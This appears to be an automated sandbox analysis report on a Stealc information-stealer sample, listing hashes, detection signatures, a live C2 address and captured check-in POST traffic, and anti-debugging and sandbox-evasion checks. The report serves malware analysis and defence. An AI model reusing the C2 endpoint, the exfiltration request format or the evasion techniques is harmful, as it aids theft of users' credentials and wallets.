Windows Analysis Report
XDPT5mgIBO.exe

Overview

General Information

Sample name: XDPT5mgIBO.exe
renamed because original name is a hash value
Original sample name: 6764f657774334189cbecc80dbb3c855.exe
Analysis ID: 1527619
MD5: 6764f657774334189cbecc80dbb3c855
SHA1: 9f597f7e92400f0c83f6166d1ec4a9228b3c5514
SHA256: ef31a45fb90a7cae12898b6f16cf2c48c06d75ca03f5aaf4fc48bbbd1385be11
Tags: 32exetrojan
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: XDPT5mgIBO.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37/ URL Reputation: Label: malware
Source: http://185.215.113.37 URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php URL Reputation: Label: malware
Found malware configuration
Source: 0.2.XDPT5mgIBO.exe.640000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.37/ws Virustotal: Detection: 16% Perma Link
Multi AV Scanner detection for submitted file
Source: XDPT5mgIBO.exe Virustotal: Detection: 53% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: XDPT5mgIBO.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_0064C820
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00647240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00647240
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00649AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00649AC0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00649B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00649B60
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00658EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00658EA0
Uses 32bit PE files
Source: XDPT5mgIBO.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_006538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_006538B0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00654910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00654910
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0064DA80
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0064E430
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00654570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00654570
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0064ED20
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0064BE70
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0064DE10
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_006416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006416D0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00653EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00653EA0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0064F6B0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 31 32 31 33 41 45 32 44 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 2d 2d 0d 0a Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="hwid"711213AE2D294266498721------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="build"doma------EGIJEBGDAFHIJJKEHCAA--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00644880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00644880
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 31 32 31 33 41 45 32 44 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 2d 2d 0d 0a Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="hwid"711213AE2D294266498721------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="build"doma------EGIJEBGDAFHIJJKEHCAA--
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001402000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&F
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.G
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php09
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpO9
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e9
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ws
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37d

System Summary
barindex
PE file contains section with special chars
Source: XDPT5mgIBO.exe Static PE information: section name:
Source: XDPT5mgIBO.exe Static PE information: section name: .rsrc
Source: XDPT5mgIBO.exe Static PE information: section name: .idata
Source: XDPT5mgIBO.exe Static PE information: section name:
Detected potential crypto function
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 0_2_009C4888
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A 0_2_00A0D02A
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A12074 0_2_00A12074
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_008BF870 0_2_008BF870
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_008DE9CC 0_2_008DE9CC
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_008E09E9 0_2_008E09E9
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009222A7 0_2_009222A7
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A09A41 0_2_00A09A41
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A13B86 0_2_00A13B86
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00933B55 0_2_00933B55
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A10C87 0_2_00A10C87
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A06487 0_2_00A06487
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009DFCFC 0_2_009DFCFC
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_008EFCF6 0_2_008EFCF6
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A5545A 0_2_00A5545A
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A155A1 0_2_00A155A1
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009F6DCC 0_2_009F6DCC
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009A05FD 0_2_009A05FD
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00911E8B 0_2_00911E8B
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00AA5E2F 0_2_00AA5E2F
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0B602 0_2_00A0B602
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0096363F 0_2_0096363F
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C8FCF 0_2_009C8FCF
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A07FCF 0_2_00A07FCF
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: String function: 006445C0 appears 316 times
Uses 32bit PE files
Source: XDPT5mgIBO.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: XDPT5mgIBO.exe Static PE information: Section: ogawuknu ZLIB complexity 0.9949054810160024
Source: XDPT5mgIBO.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: XDPT5mgIBO.exe, 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00659600
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00653720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00653720
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\OD4RT2OV.htm Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: XDPT5mgIBO.exe Virustotal: Detection: 53%
Source: XDPT5mgIBO.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: XDPT5mgIBO.exe Static file information: File size 1852416 > 1048576
Source: XDPT5mgIBO.exe Static PE information: Raw size of ogawuknu is bigger than: 0x100000 < 0x19e000

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Unpacked PE file: 0.2.XDPT5mgIBO.exe.640000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ogawuknu:EW;hgmhlbrt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ogawuknu:EW;hgmhlbrt:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00659860
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: XDPT5mgIBO.exe Static PE information: real checksum: 0x1c74d3 should be: 0x1cbc26
PE file contains sections with non-standard names
Source: XDPT5mgIBO.exe Static PE information: section name:
Source: XDPT5mgIBO.exe Static PE information: section name: .rsrc
Source: XDPT5mgIBO.exe Static PE information: section name: .idata
Source: XDPT5mgIBO.exe Static PE information: section name:
Source: XDPT5mgIBO.exe Static PE information: section name: ogawuknu
Source: XDPT5mgIBO.exe Static PE information: section name: hgmhlbrt
Source: XDPT5mgIBO.exe Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00B010A0 push edx; mov dword ptr [esp], ecx 0_2_00B010BD
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 push 784E2553h; mov dword ptr [esp], ebx 0_2_009C4940
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 push eax; mov dword ptr [esp], esp 0_2_009C496B
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 push ebp; mov dword ptr [esp], 29AF872Dh 0_2_009C4A13
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 push esi; mov dword ptr [esp], eax 0_2_009C4A87
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 push edx; mov dword ptr [esp], ebp 0_2_009C4A8B
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0065B035 push ecx; ret 0_2_0065B048
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A750FF push 1249C73Bh; mov dword ptr [esp], edx 0_2_00A75123
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00ADD028 push 3FE43887h; mov dword ptr [esp], esi 0_2_00ADD031
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00ADD028 push edx; mov dword ptr [esp], ebx 0_2_00ADD03A
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 150092ECh; mov dword ptr [esp], esp 0_2_00A0D049
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 3F4DC2A3h; mov dword ptr [esp], esi 0_2_00A0D141
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 3D8497E0h; mov dword ptr [esp], edi 0_2_00A0D16E
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 6D32BA32h; mov dword ptr [esp], ebx 0_2_00A0D1A8
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push ecx; mov dword ptr [esp], ebp 0_2_00A0D240
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 63C14947h; mov dword ptr [esp], esi 0_2_00A0D259
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 08FE84AAh; mov dword ptr [esp], ecx 0_2_00A0D2B1
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 45E89993h; mov dword ptr [esp], esi 0_2_00A0D314
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 15A22B5Ch; mov dword ptr [esp], edx 0_2_00A0D3A7
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push edi; mov dword ptr [esp], 4977C910h 0_2_00A0D3EA
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push eax; mov dword ptr [esp], 7EDD835Ch 0_2_00A0D42E
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax 0_2_00A0D464
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax 0_2_00A0D47F
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push ecx; mov dword ptr [esp], 7BF5FF9Ch 0_2_00A0D483
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 66E731C2h; mov dword ptr [esp], edx 0_2_00A0D4C8
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax 0_2_00A0D4CC
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push eax; mov dword ptr [esp], esi 0_2_00A0D518
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 310F477Fh; mov dword ptr [esp], esp 0_2_00A0D520
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push esi; mov dword ptr [esp], edx 0_2_00A0D58B
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 07A77AC7h; mov dword ptr [esp], ecx 0_2_00A0D65A
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 05B64D79h; mov dword ptr [esp], edi 0_2_00A0D662
Source: XDPT5mgIBO.exe Static PE information: section name: ogawuknu entropy: 7.953433173066681

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00659860

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
